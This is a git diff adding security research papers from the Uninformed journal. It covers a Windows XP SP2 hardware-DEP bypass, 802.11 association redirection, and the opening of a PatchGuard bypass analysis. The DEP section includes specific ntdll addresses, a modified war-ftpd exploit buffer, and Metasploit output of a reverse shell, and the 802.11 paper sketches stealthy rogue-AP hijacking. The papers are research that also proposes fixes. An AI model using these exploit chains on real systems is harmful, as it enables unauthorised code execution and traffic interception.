7c91d3f8 3c01             cmp     al,0x1
7c91d3fa 6a02             push    0x2
7c91d3fc 5e               pop     esi
7c91d3fd 0f84b72a0200     je      ntdll!LdrpCheckNXCompatibility+0x1a (7c93feba)


In this block, a check is made to see if the low byte of eax is set to one.
Regardless of whether or not it is, esi is initialized to hold the value 2.
After that, a check is made to see if the zero flag is set (as would be the case
if the low byte of eax is 1). Since this code will be executed after the first
mov al, 0x1 / ret set of instructions, the zero flag will always be set, thus
transferring control to 0x7c93feba.


ntdll!LdrpCheckNXCompatibility+0x1a:
7c93feba 8975fc           mov     [ebp-0x4],esi
7c93febd e941d5fdff       jmp     ntdll!LdrpCheckNXCompatibility+0x1d (7c91d403)


This block sets a local variable to the contents of esi, which in this case is
2. Afterwards, it transfers control to 0x7c91d403.


ntdll!LdrpCheckNXCompatibility+0x1d:
7c91d403 837dfc00         cmp     dword ptr [ebp-0x4],0x0
7c91d407 0f8560890100     jne     ntdll!LdrpCheckNXCompatibility+0x4d (7c935d6d)


This block, in turn, compares the local variable that was just initialized to 2
with 0. If it's not zero (which it won't be), control is transferred to
0x7c935d6d.


ntdll!LdrpCheckNXCompatibility+0x4d:
7c935d6d 6a04             push    0x4
7c935d6f 8d45fc           lea     eax,[ebp-0x4]
7c935d72 50               push    eax
7c935d73 6a22             push    0x22
7c935d75 6aff             push    0xff
7c935d77 e8b188fdff       call    ntdll!ZwSetInformationProcess (7c90e62d)
7c935d7c e9c076feff       jmp     ntdll!LdrpCheckNXCompatibility+0x5c (7c91d441)


It's at this point that things begin to get interesting. In this block, a call
is issued to NtSetInformationProcess with the ProcessExecuteFlags information
class. The ProcessInformation parameter points to the local variable that was
previously initialized to 2 [3]. This results in NX support being disabled for
the process. After the call completes, it transfers control to 0x7c91d441.


ntdll!LdrpCheckNXCompatibility+0x5c:
7c91d441 5e               pop     esi
7c91d442 c9               leave
7c91d443 c20400           ret     0x4


Finally, this block simply restores saved registers, issues a leave instruction,
and returns to the caller. In this case, the attacker will have set up the
frame in such a way that the ret instruction actually returns into a general
purpose instruction that transfers control into a controllable buffer that
contains the arbitrary code to be executed now that NX support has been
disabled.

This approach requires the knowledge of three addresses. First, the address of
the mov al, 0x1 / ret equivalent must be known. Fortunately, there are many
occurrences of this type of block, though they may not be as simplistic as the
one described in this document. Second, the address of the start of the cmp al,
0x1 block inside ntdll!LdrpCheckNXCompatibility must be known.
By depending on
two addresses within ntdll, it stands to reason that an exploit can be more
portable than if one were to depend on addresses from two different DLLs.
Finally, the third address is the one that would typically be used on targets
that don't have hardware-enforced DEP, such as a jmp esp or equivalent
instruction, depending on the vulnerability in question.

Aside from specific address limitations, this approach also relies on the fact
that ebp points to a valid, writable address such that the value that
indicates that NX support should be disabled can be temporarily stored. This
can be accomplished a few different ways, depending on the vulnerability, so it
is not seen as a largely limiting factor.

To test this approach, the authors modified the warftpd_165_user exploit from
the Metasploit Framework that was written by Fairuzan Roslan. This
vulnerability is a simple stack overflow. Prior to our modifications, the
exploit was implemented in the following manner:


my $evil = $self->MakeNops(1024);
substr($evil, 485, 4, pack("V", $target->[1]));
substr($evil, 600, length($shellcode), $shellcode);


This code built a NOP sled of 1024 bytes. The return address was stored at
byte index 485, after which the shellcode was appended [4]. When run against a
target that supports hardware-enforced DEP, the exploit fails when it tries to
execute the first instruction of the NOP sled because the region of memory (the
thread stack) is marked as non-executable.

Applying the technique described above, the authors changed the exploit to send
a buffer structured as follows:


my $evil = "\xcc" x 485;
$evil .= "\x80\x20\x95\x7c";
$evil .= "\xff\xff\xff\xff";
$evil .= "\xf8\xd3\x91\x7c";
$evil .= "\xff\xff\xff\xff";
$evil .= "\xcc" x 0x54;
$evil .= pack("V", $target->[1]);
$evil .= $shellcode;
$evil .= "\xcc" x (1024 - length($evil));


In this case, a buffer was built that contained 485 int3 instructions. From
there, the buffer was set to overwrite the return address with a pointer to
ntdll!NtdllOkayToLockRoutine. Since this routine does a retn 0x4, the next four
bytes are padding as a fake argument that is popped off the stack. Once
NtdllOkayToLockRoutine returns, the stack would point 493 bytes into the evil
buffer that is being built (immediately after the 0x7c952080 return address
overwrite and the fake argument). This means that NtdllOkayToLockRoutine would
return into 0x7c91d3f8. This block of code is what evaluates the low byte of
eax and eventually leads to the disabling of NX support for the process. Once
completed, the block pops saved registers off the stack and issues a leave
instruction, moving the stack pointer to where ebp currently points. In this
case, ebp was 0x54 bytes away from esp, so we inserted 0x54 bytes of padding.
Once the block does this, the stack pointer will point 577 bytes into the evil
buffer (immediately after the 0x54 bytes of padding). This means that it will
return into whatever address is stored at this location. In this case, the
buffer is populated such that it simply returns into the target-specified return
address (which is a jmp esp equivalent instruction). From there, the jmp esp
instruction is executed which transfers control into the shellcode that
immediately follows it.
Once executed, the exploit works as if nothing had
changed:

$ ./msfcli warftpd_165_user_dep RHOST=192.168.244.128 RPORT=4446 \
    LHOST=192.168.244.2 LPORT=4444 PAYLOAD=win32_reverse TARGET=2 E
[*] Starting Reverse Handler.
[*] Trying Windows XP SP2 English using return address 0x71ab9372....
[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
[*] Sending evil buffer....
[*] Got connection from 192.168.244.2:4444 <-> 192.168.244.128:46638

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\War-ftpd>


As can be seen, the technique described in this document outlines a feasible
method that can be used to circumvent the security enhancements provided by
hardware-enforced DEP in the default installations of Windows XP Service Pack 2
and Windows 2003 Server Service Pack 1. The flaw itself is not related to any
specific inefficiency or mistake made during the actual implementation of
hardware-enforced DEP support, but instead is a side effect of a design decision
by Microsoft to provide a mechanism for disabling NX support for a process from
within a user-mode process. Had it been the case that there was no mechanism by
which NX support could be disabled at runtime from within a process, the
approaches outlined in this document would not be feasible.

In the interest of not presenting a problem without also describing a solution,
the authors have identified a few different ways in which Microsoft might be
able to solve this. To prevent this approach, it is first necessary to identify
the things that it depends on. First and foremost, the technique depends on
knowing the location of three separate addresses. Second, it depends on the
feature being exposed that allows a user-mode process to disable NX support for
itself. Finally, it depends on the ability to control the stack in a manner
that allows it to perform a ret2libc style attack [5].

The first dependency could be broken by instituting some form of Address Space
Layout Randomization that would thereby make the location of the dependent code
blocks unknown to an attacker. The second dependency could be broken by moving
the logic that controls the enabling and disabling of a process' NX support to
kernel-mode such that it cannot be influenced in such a direct manner. This
approach is slightly challenging considering that the model it is currently
implemented under requires the ability to disable NX support when certain
events (such as the loading of an incompatible DLL) occur. Although it may be
more challenging, the authors see this as being the most feasible approach in
terms of compatibility. Lastly, the final dependency is not really something
that Microsoft can control. Aside from these potential solutions, it might also
be possible to come up with a way to make it so the permanent flag is set
sooner in the process' initialization, though the authors are not sure of a way
in which this could be made possible without breaking support for disabling
when certain DLLs are loaded.

In closing, the authors would like to make a special point to indicate that
Microsoft has done an excellent job in raising the bar with their security
improvements in XP Service Pack 2.
The technique outlined in this document should not be seen as a case of
+Microsoft failing to implement something securely, as the provisions are
+certainly there to deploy hardware-enforced DEP in a secure fashion, but
+instead might be better viewed as a concession that was made to ensure that
+application compatibility was retained for the general case. There is almost
+always a trade-off when it comes to providing new security features in the
+face of potential compatibility problems, and perhaps no company is better
+known than Microsoft for retaining backward compatibility.
+
+
+Footnotes
+
+[1] There are other documented techniques for bypassing non-executable
+    protections, such as returning into ZwProtectVirtualMemory or doing a
+    chained ret2libc style attack, but these approaches tend to be more
+    complicated and in many cases are more restricted due to the need to use
+    bytes (such as NULL bytes) that would otherwise be unusable in common
+    situations.
+
+[2] With a few parameters that will be discussed later.
+
+[3] The reason this has to point to 2 and not some integer that has just the
+    low byte set to 2 is because nt!MmSetExecutionOptions has a check to
+    ensure that the unused bits are not set.
+
+[4] In reality, it may not be the return address that is being overwritten,
+    but instead might be a function pointer. The fact that it is at a
+    misaligned address lends credence to this possibility, though it is
+    certainly not a clear indication.
+
+[5] This is possible even when an SEH overwrite is leveraged, given the right
+    conditions. The basic approach is to locate a pop reg, pop reg, pop esp,
+    ret instruction set in a region that is not protected by SafeSEH (such as
+    a third-party DLL that was not compiled with /GS). The pop esp shifts the
+    stack to the start of the EstablisherFrame that is controlled by the
+    attacker and the ret returns into the address stored within the
+    overwritten Next pointer. If one were to set the Next pointer to the
+    location of the NtdllOkayToLockRoutine and the stack were set up as
+    explained above, the technique used to bypass hardware-enforced DEP that
+    is described in this document could be made to work.
+
+
+Bibliography
+
+The Metasploit Project. War-ftpd 1.65 USER Overflow.
+http://www.metasploit.com/projects/Framework/exploits.html#warftpd_165_user;
+accessed Oct 2, 2005.
+
+Microsoft Corporation. Data Execution Prevention.
+http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/BookofSP1/b0de1052-4101-44c3-a294-4da1bd1ef227.mspx;
+accessed Oct 2, 2005.
diff --git a/uninformed/2.4.txt b/uninformed/2.4.txt
new file mode 100644
index 0000000..e21f1ed
--- /dev/null
+++ b/uninformed/2.4.txt
@@ -0,0 +1,235 @@
+802.11 VLANs
+Johnny Cache
+johnycsh@gmail.com
+Last modified: 09/07/05
+
+1) Foreword
+
+Abstract: The goal of this paper is to introduce the reader to association
+redirection and how it could be used to implement something analogous to the
+VLANs found in wired media in a typical IEEE 802.11 environment. What makes
+this technique interesting is that it can be accomplished without breaking
+the IEEE 802.11 standard on the client side, and requires only minor changes
+made to the Access Point (AP). No modifications are made to the 802.11 MAC.
+It is the author's hope that after reading this paper the reader will not
+only understand the specific technique outlined below, but will consider
+protocol quirks with a new perspective in the future. 
+
+
+2) Background
+
+The IEEE 802.11 specification defines a hierarchy of three states a client
+can be in. When a client wishes to connect to an Access Point (AP), he
+progresses from state 1 to 2 to 3. The client progresses initially from
+state 1 to state 2 by successfully authenticating (this authentication stage
+happens even when there is no security enabled). Similarly, the client
+progresses from state 2 to 3 by associating. Once a client has associated,
+he enters state 3 and can transmit data using the AP.
+
+
+Unlike Ethernet (802.3) and other link layer headers, 802.11 headers contain
+at least 3 addresses: source, destination, and Basic Service Set ID (BSSID).
+The BSSID can be best thought of as a "through" field. Packets destined for
+the AP's interface have both destination and BSSID set to the same value. A
+packet destined for a different host on the same WLAN, however, would have
+the BSSID set to the AP and the destination set to the host.
+
+
+The state transition diagram in the standard dictates that if a client
+receives an association response with a different BSSID than the BSSID that
+it was associating with, then the client should associate to the new BSSID.
+The technique of sending an association response with a different BSSID in
+the header is known as association redirection. While the motivation for
+this idiosyncrasy is unclear, it can be leveraged to dynamically create what
+has been described as a personal virtual bridged LAN (PVLAN).
+
+
+3) Introduction
+
+The most compelling reason to virtualize APs has been security. There are
+currently two possible techniques for doing this, though only one has been
+deployed in the wild. The most prevalent has been implemented by Colubris in
+their virtual access point technology.
+
+
+The other technique, public access point (PAP) and personal virtual bridged
+LANs (PVLANs), which is described in this paper, has been documented in U.S.
+patent no. 20040141617.
+
+
+3.1) The state of the art
+
+The Colubris virtual access point technology is a single physical device
+that implements an entirely independent 802.11 MAC protocol layer (including
+a unique BSSID) for each virtual AP. The only thing shared between the
+individual virtual APs is the hardware they are running on. The device goes
+so far as to implement virtual Management Information Bases (MIBs) for each
+virtual AP. The Colubris solution fits well into a heavily managed, static
+environment where the users and the groups they belong to are well defined.
+Deploying it requires that each user knows a priori which SSID to associate
+with, along with any required authentication credentials. The virtual access
+point is capable of mapping virtual access points into 802.1q VLANs.
+
+
+The public AP solution fits well into less managed networks. Public AP
+utilizes the technique outlined in this paper. The Public AP broadcasts a
+single beacon for a Public Access Point (PAP). When a client attempts to
+associate, the PAP redirects him to a dynamically generated VBSSID, placing
+him on his own PVLAN. This is well suited to a typical hotspot scenario
+where there is no implicit trust between users, and the number of clients is
+not known beforehand. This technique could also be used in conjunction with
+traditional 802.1q VLANs, however its strength lies in the lower burden of
+administrative requirements. 
This technique is designed to work well when deployed in the
+common hot spot scenario where the administrators have little other network
+infrastructure and the only thing upstream is a best effort common carrier
+provider.
+
+
+4) PVLANs and virtual BSSIDs
+
+PVLANs are called Personal Bridged VLANs because the VLAN is created
+dynamically for the client. The client essentially owns the VLAN since he
+controls its creation and its lifetime. In the most common scenario there
+would only be a single client per PVLAN.
+
+
+An access point that implements the PAP concept intentionally re-directs
+associating clients to their own dynamically generated BSSID (Virtual BSSID
+or VBSSID).
+
+
+As an example, the AP might broadcast a public BSSID of 00:11:22:33:44:55
+while redirecting the client to his own VBSSID of 00:22:22:22:22:22.
+
+
+5) The Experiment
+
+The experiment conducted was not a full-blown implementation of a PAP. The
+experiment was designed to test a wide variety of chipsets, cards, and
+drivers for compatibility with the standard and susceptibility to
+association re-direction. To this end all the cards were subjected to every
+reasonable interpretation of the standard.
+
+
+The experiment was conducted by making some simple changes to the host-ap
+driver on Linux. Host-ap can operate in Access Point mode as well as in
+client mode. All the modifications were made in Access Point mode. Host-ap's
+client-side performance is unrelated to the changes made for the experiment.
+
+
+The experiment was conducted in two phases. First, host-ap was modified to
+mangle all management frames by modifying the source, the BSSID, and both
+the source and BSSID at the same time. The results of this are reflected in
+table one.
+
+After this was complete, host-ap was modified to return authentication
+replies un-mangled. This was due to the number of cards that simply ignored
+mangled authentication replies. These results are cataloged in table two.
+
+
+5.1) The Results
+
+The responses in table one varied all the way from never leaving state 1 to
+successful redirection. The most interesting cases are the drivers that
+successfully made it to state 3. There are three cases of this. The cases
+marked ORIGINALBSSID are what was initially expected from many devices:
+that they would simply ignore the redirect request and continue to transmit
+on the PAP BSSID. The REDIRECTREASSOC case is a successful redirection with
+a small twist. The card transmits all data to the VBSSID, however it
+periodically sends out reassociation requests to the PAP BSSID.
+
+The SCHIZO case is the other case that made it into state 3. In this case
+the card is listening on the PAP BSSID and then proceeds to transmit on the
+VBSSID. The device seems to ignore any data transmitted to it on the VBSSID.
+
+
+As mentioned previously, the possibility of cards ignoring authentication
+replies was eliminated in table two by not mangling fields until the
+association request. This opened up the possibility for some interesting
+responses.
+
+The Apple AirPort Extreme card responded with a flood of deauthentication
+packets to the null BSSID with a destination of the AP (DEAUTHFLOOD). The
+Atheros card is the only other card that sent a deauth, though it had a much
+more measured response, sending a single deauth to the original BSSID
+(SIMPLEDEAUTHSTA).
+
+The other new response in table two is the DUALBSSID behavior. These cards
+seem to alternate between both BSSIDs on every other transmitted packet. It
+is unknown whether they continue to do this for the entire connection or if
+this is some sort of intentional behavior and they will choose whichever
+BSSID they receive data on first.
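+
+In terms of the 802.11 header, all of the mangling described above comes down
+to rewriting one or both of two fields in the management frames that the AP
+transmits. The following is a minimal sketch of the three-address management
+frame header from the Background section and of the rewrite applied to an
+association response. The field layout follows IEEE 802.11-1999; the helper
+function and its names are purely illustrative and are not taken from the
+modified host-ap driver.
+
+
+#include <stdint.h>
+#include <string.h>
+
+/* Three-address 802.11 management frame header (IEEE 802.11-1999). */
+struct ieee80211_mgmt_hdr {
+    uint16_t frame_control;
+    uint16_t duration;
+    uint8_t  addr1[6];      /* destination (the client)  */
+    uint8_t  addr2[6];      /* source (the answering AP) */
+    uint8_t  addr3[6];      /* BSSID                     */
+    uint16_t seq_ctrl;
+} __attribute__((packed));
+
+/* Association redirection: answer the client from a dynamically generated
+ * virtual BSSID instead of the public BSSID it tried to associate with. */
+static void redirect_assoc_resp(struct ieee80211_mgmt_hdr *resp,
+                                const uint8_t vbssid[6])
+{
+    memcpy(resp->addr2, vbssid, 6);  /* mangle the source field */
+    memcpy(resp->addr3, vbssid, 6);  /* mangle the BSSID field  */
+}
+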
+The experiment provided some very surprising results. Originally it was
+suspected that many cards would simply never enter state 3, or would just
+continue to use the original BSSID they set out to associate with. Quite a
+few cards can be convinced to go into dual BSSID behavior and might be
+susceptible to association redirection. Two drivers for the Hermes chipset
+were successfully redirected.
+
+
+6) Future Work
+
+Clearly, modifying client side drivers for better standards compliance is
+one area where work could be done. More interesting questions remain,
+however: how does one handle key management on the AP in this situation?
+Clearly any PSK solutions don't really apply in this scenario. How much
+deviation from the spec needs to happen for WPA 802.1x authentication to be
+successfully deployed? One interesting area of research is the concept of a
+stealthy rogue AP.
+
+
+By using association redirection, clients could be the victims of stealthy
+(from the perspective of the network admin) association hijacking from a
+rogue AP. An adversary could just set up shop with a modified host-ap driver
+on a Linux box that didn't transmit beacons. Rather, it would wait for a
+client to attempt an association request with the legitimate access point
+and try to win a race condition to see who could send an association reply
+first. Alternatively, the adversary could simply de-authenticate the user
+and then be poised to win the race.
+
+
+Another interesting question is whether or not a PAP could withstand a DoS
+attack attempting to create an overwhelming number of VBSSIDs. It is the
+author's opinion that a suitable algorithm could be found to make the
+resources required for the attack too costly for most. By dynamically
+expiring PVLANs and VBSSIDs as a function of time and traffic, the PAP could
+burden the attacker with keeping track of all his VBSSIDs as well, instead
+of just creating as many as he can and forgetting about them.
+
+
+7) Conclusion
+
+It is unlikely that this technique could successfully be deployed to create
+PVLANs in a general scenario due to varied behavior from the vendors.
+However, it does appear that a determined attacker could encode the data
+generated from this experiment into a modified host-ap driver so that he
+could stealthily redirect traffic to himself. This would give the attacker a
+slight advantage over typical ARP poisoning attacks since he doesn't need to
+generate any suspicious ARP activity. It also has an advantage over simple
+rogue access points, as it requires no beacons, which can easily be
+detected.
+
+
+8) Bibliography
+
+Volpano, Dennis. United States Patent Application 20040141617. July 22,
+2003. http://appft1.uspto.gov/netahtml/PTO/search-adv.html
+
+Institute of Electrical and Electronics Engineers. Information technology -
+Telecommunications and information exchange between systems - Local and
+metropolitan area networks - Specific Requirements Part 11: Wireless LAN
+Medium Access Control (MAC) and Physical Layer (PHY) Specifications, IEEE
+Std. 802.11-1999, 1999. (pg 376)
+
+Aboba, Bernard. Virtual Access Points (IEEE document IEEE 802.11-03/154r1).
+May 22, 2003.
+http://www.drizzle.com/~aboba/IEEE/11-03-154r1-I-Virtual-Access-Points.doc
+
+Colubris Networks. 
Virtual Access Point Technology Multiple WLAN Services +http://www.colubris.com/literature/whitepapers.asp +accessed Aug 09, 2005. + + + + + diff --git a/uninformed/2.txt b/uninformed/2.txt new file mode 100644 index 0000000..22ab714 --- /dev/null +++ b/uninformed/2.txt @@ -0,0 +1,25 @@ + + +Engineering in Reverse +Inside Blizzard: Battle.net +Skywing +This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat service, Battle.net. The paper provides some background historical information into the design and purpose of Battle.net and continues on to discuss a variety of flaws that have been observed in the implementation of the system. Readers should come away with a better understanding of problems that can be easily introduced in designing a matchmaking/chat system to operate on such a large scale in addition to some of the serious security-related consequences of not performing proper parameter validation of untrusted clients. +html | pdf | txt + +Exploitation Technology +Temporal Return Addresses +skape +Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable. +html | pdf | txt | code.tgz + +Bypassing Windows Hardware-enforced DEP +skape & Skywing +This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits. +html | pdf | txt + +General Research +802.11 VLANs and Association Redirection +Johnny Cache +The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. What makes this technique interesting is that it can be accomplished without breaking the IEEE 802.11 standard on the client side, and requires only minor changes made to the Access Point (AP). No modifications are made to the 802.11 MAC. 
It is the author's hope that after reading the paper the reader will not only understand the specific technique outlined below, but will consider protocol specifications with a new perspective in the future. +html | pdf | txt + diff --git a/uninformed/3.1.txt b/uninformed/3.1.txt new file mode 100644 index 0000000..dc55c79 --- /dev/null +++ b/uninformed/3.1.txt @@ -0,0 +1,2069 @@ +Bypassing PatchGuard on Windows x64 +skape & Skywing +Dec 1, 2005 + + +1) Foreword + +Abstract: The Windows kernel that runs on the x64 platform +has introduced a new feature, nicknamed PatchGuard, that is intended +to prevent both malicious software and third-party vendors from +modifying certain critical operating system structures. These +structures include things like specific system images, the SSDT, the +IDT, the GDT, and certain critical processor MSRs. This feature is +intended to ensure kernel stability by preventing uncondoned +behavior, such as hooking. However, it also has the side effect of +preventing legitimate products from working properly. For that +reason, this paper will serve as an in-depth analysis of +PatchGuard's inner workings with an eye toward techniques that can +be used to bypass it. Possible solutions will also be proposed for +the bypass techniques that are suggested. + +Thanks: The authors would like to thank westcose, bugcheck, uninformed, +Alex Ionescu, Filip Navara, and everyone who is motivated to learn by +their own self interest. + +Disclaimer: The subject matter discussed in this document is +presented in the interest of education. The authors cannot be held +responsible for how the information is used. While the authors have +tried to be as thorough as possible in their analysis, it is possible +that they have made one or more mistakes. If a mistake is observed, +please contact one or both of the authors so that it can be corrected. + +2) Introduction + + +In the caste system of operating systems, the kernel is king. And +like most kings, the kernel is capable of defending itself from the +lesser citizens, such as user-mode processes, through the castle +walls of privilege separation. However, unlike most kings, the +kernel is typically unable to defend itself from the same privilege +level at which it operates. Without the kernel being able to +protect its vital organs at its own privilege level, the entire +operating system is left open to modification and subversion if any +code is able to run with the same privileges as the kernel itself. + +As it stands today, most kernel implementations do not provide a +mechanism by which critical portions of the kernel can be validated +to ensure that they have not been tampered with. If existing +kernels were to attempt to deploy something like this in an +after-the-fact manner, it should be expected that a large number of +problems would be encountered with regard to compatibility. While +most kernels intentionally do not document how internal aspects are +designed to function, like how system call dispatching works, it is +likely that at least one or more third-party vendor may depend on +some of the explicit behaviors of the undocumented implementations. + +This has been exactly the case with Microsoft's operating systems. 
+
+Starting even in the days of Windows 95, and perhaps even prior to that,
+Microsoft realized that allowing third-party vendors to twiddle or otherwise
+play with various critical portions of the kernel led to nothing but
+headaches and stability problems, even though it provided the highest level
+of flexibility. While Microsoft took a stronger stance with Windows NT, it
+has still become the case that third-party vendors use areas of the kernel
+that are of particular interest for accomplishing certain feats, even though
+the means used to accomplish them require the use of undocumented structures
+and functions.
+
+While it's likely that Microsoft realized their fate long ago with regard to
+losing control over the scope and types of changes they could make to the
+kernel internally without affecting third-party vendors, their ability to do
+anything about it has been drastically limited. If Microsoft were to deploy
+code that happened to prevent major third-party vendors from being able to
+accomplish their goals without providing an adequate replacement, then
+Microsoft would be in a world of hurt that would most likely rhyme with
+antitrust. Even though things have appeared bleak, Microsoft got their
+chance to reclaim higher levels of flexibility in the kernel with the
+introduction of the x64 architecture. While some places use x64 to mean both
+AMD64 and IA64, this document will generally refer to x64 as an alias for
+AMD64 only, though many of the comments may also apply to IA64. Since the
+Windows kernel on the x64 architecture operates in 64-bit mode, it stands as
+a requirement that all kernel-mode drivers also be compiled to run and
+operate in native 64-bit mode. There are a number of reasons for this that
+are outside of the scope of this document, but suffice it to say that
+attempting to design a thunking layer for device drivers that have any real
+performance considerations should be enough to illustrate that doing so
+would be a horrible idea.
+
+By requiring that all device drivers be compiled natively as 64-bit
+binaries, Microsoft effectively leveled the playing field on the new
+platform and brought it back to a clean slate. This allowed them to not have
+to worry about potential compatibility conflicts with existing products
+because of the simple fact that none had been established. As third-party
+vendors ported their device drivers to 64-bit mode, any unsupported or
+uncondoned behavior on the part of the driver could be documented as being
+prohibited on the x64 architecture, thus forcing the third party to find an
+alternative approach if possible. This is the dream of PatchGuard,
+Microsoft's anti-patch protection system, and it seems logical that such a
+goal is a reasonable one, but that's not the point of this document.
+
+Instead, this document will focus on the changes to the x64 kernel that are
+designed to protect critical portions of the Windows kernel from being
+modified. This document will describe how the protection mechanisms are
+implemented and what areas of the kernel are protected. From there, a couple
+of different approaches that could be used to disable and bypass the
+protection mechanisms will be explained in detail as well as potential
+solutions to the bypass techniques. In conclusion, the reasons and
+motivations will be summarized and other solutions to the more fundamental
+problem will be discussed. 
+ +The real purpose of this document, though, is to illustrate that it +is impossible to securely protect regions of code and data through +the use of a system that involves monitoring said regions at a +privilege level that is equal to the level at which third-party code +is capable of running. This fact is something that is well-known, +both by Microsoft and by the security population at large, +and it should be understood without requiring an explanation. Going +toward the future, the operating system world will most likely begin +to see a shift toward more granular, hardware-enforced privilege +separation by implementing segregated trusted code bases. The +questions this will raise with respect to open-source operating +systems and DRM issues should slowly begin to increase. Only time +will tell. + +3) Implementation + + +The anti-patching technology provided in the Windows x64 kernel, +nicknamed PatchGuard, is intended to protect critical kernel +structures from being modified outside of the context of approved +modifications, such as through Microsoft-controlled hot patching. At +the time of this writing, PatchGuard is designed to protect the +following critical structures: + + + - SSDT (System Service Descriptor Table) + - GDT (Global Descriptor Table) + - IDT (Interrupt Descriptor Table) + - System images (ntoskrnl.exe, ndis.sys, hal.dll) + - Processor MSRs (syscall) + + +At a high-level, PatchGuard is implemented in the form of a set of +routines that cache known-good copies and/or checksums of structures +which are then validated at certain random time intervals (roughly +every 5 - 10 minutes). The reason PatchGuard is implemented in a +polling fashion rather than in an event-driven or hardware-backed +fashion is because there is no native hardware level support for the +things that PatchGuard is attempting to accomplish. For that +reason, a number of the tricks that PatchGuard resorted to were done +so out of necessity. + +The team that worked on PatchGuard was admittedly very clever. They +realized the limitations of implementing an anti-patching model in a +fashion described in the introduction and thus were forced to resort +to other means by which they might augment the protection +mechanisms. In particular, PatchGuard makes extensive use of +security through obscurity by using tactics like misdirection, +misnamed functions, and general code obfuscation. While many would +argue that security through obscurity adds nothing, the authors +believe that it's merely a matter of raising the bar high enough so +as to eliminate a significant number of people from being able to +completely understand something. + +The code to initialize PatchGuard begins early on in the boot +process as part of nt!KeInitSystem. And that's where the fun begins. + +3.1) Initializing PatchGuard + + +The initialization of PatchGuard is multi-faceted, but it all has to +start somewhere. In this case, the initialization of PatchGuard starts +in a function with a symbol name that has nothing to do with anti-patch +protections at all. In fact, it's named KiDivide6432 and the only thing +that it does is a division operation as shown in the code below: + + +ULONG KiDivide6432( + IN ULONG64 Dividend, + IN ULONG Divisor) +{ + return Dividend / Divisor; +} + + +Though this function may look innocuous, it's actually the first time +PatchGuard attempts to use misdirection to hide its actual intentions. +In this case, the call to nt!KiDivide6432 is passed a dividend value +from nt!KiTestDividend. 
The divisor is hard-coded to be 0xcb5fa3. It
+appears that this function is intended to masquerade as some type of
+division test that ensures that the underlying architecture supports
+division operations. If the call to the function does not return the
+expected result of 0x5ee0b7e5, nt!KeInitSystem will bug check the operating
+system with bug check code 0x5d, which is UNSUPPORTED_PROCESSOR, as shown
+below:
+
+
+nt!KeInitSystem+0x158:
+fffff800`014212c2 488b0d1754d5ff   mov rcx,[nt!KiTestDividend]
+fffff800`014212c9 baa35fcb00       mov edx,0xcb5fa3
+fffff800`014212ce e84d000000       call nt!KiDivide6432
+fffff800`014212d3 3de5b7e05e       cmp eax,0x5ee0b7e5
+fffff800`014212d8 0f8519b60100     jne nt!KeInitSystem+0x170
+
+...
+
+nt!KeInitSystem+0x170:
+fffff800`0143c8f7 b95d000000       mov ecx,0x5d
+fffff800`0143c8fc e8bf4fc0ff       call nt!KeBugCheck
+
+
+When attaching with local kd, the value of nt!KiTestDividend is found to be
+hardcoded to 0x014b5fa3a053724c such that doing the division operation,
+0x014b5fa3a053724c divided by 0xcb5fa3, produces 0x1a11f49ae. That can't be
+right though, can it? Obviously, the code above indicates that any value
+other than 0x5ee0b7e5 will lead to a bug check, but it's also equally
+obvious that the machine does not bug check on boot, so what's going on
+here?
+
+The answer involves a good old-fashioned case of ingenuity. The result of
+the division operation above is a value that is larger than 32 bits. The
+AMD64 instruction set reference manual indicates that the div instruction
+will produce a divide error fault when an overflow of the quotient occurs.
+This means that as long as nt!KiTestDividend is set to the value described
+above, a divide error fault will be triggered, causing a hardware exception
+that has to be handled by the kernel. This divide error fault is what
+actually leads to the indirect initialization of the PatchGuard subsystem.
+Before going down that route, though, it's important to understand one of
+the interesting aspects of the way Microsoft did this.
+
+One of the interesting things about nt!KiTestDividend is that it's actually
+unioned with an exported symbol that is used to indicate whether or not a
+debugger is, well, present. This symbol is named nt!KdDebuggerNotPresent and
+it overlaps with the high-order byte of nt!KiTestDividend as shown below:
+
+
+lkd> dq nt!KiTestDividend L1
+fffff800`011766e0 014b5fa3`a053724c
+lkd> db nt!KdDebuggerNotPresent L1
+fffff800`011766e7 01
+
+
+The nt!KdDebuggerNotPresent global variable will be set to zero if a
+debugger is present. If a debugger is not present, the value will be one
+(default). If the above described division operation is performed while a
+debugger is attached to the system during boot, which would equate to
+dividing 0x004b5fa3a053724c by 0xcb5fa3, the resultant quotient will be the
+expected value of 0x5ee0b7e5. This means that if a debugger is attached to
+the system prior to the indirect initialization of the PatchGuard
+protections, then the protections will not be initialized because the divide
+error fault will not be triggered. This coincides with the documented
+behavior and is intended to allow driver developers to continue to be able
+to set breakpoints and perform other actions that may indirectly modify
+monitored regions of the kernel in a debugging environment. However, this
+only works if the debugger is attached to the system during boot. If a
+developer subsequently attaches a debugger after PatchGuard has initialized,
+then the act of setting breakpoints or performing other actions may lead to
+a bluescreen as a result of PatchGuard detecting the alterations.
+Microsoft's choice to initialize PatchGuard in this manner allows it to
+transparently disable protections when a debugger is attached and also acts
+as a means of hiding the true initialization vector.
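+
+The arithmetic behind this check can be illustrated with a small user-mode
+program using the values quoted above. Note that a plain C division is
+carried out in 64 bits and will not fault; the sketch below only
+demonstrates which of the two quotients fits in 32 bits, whereas the div r8d
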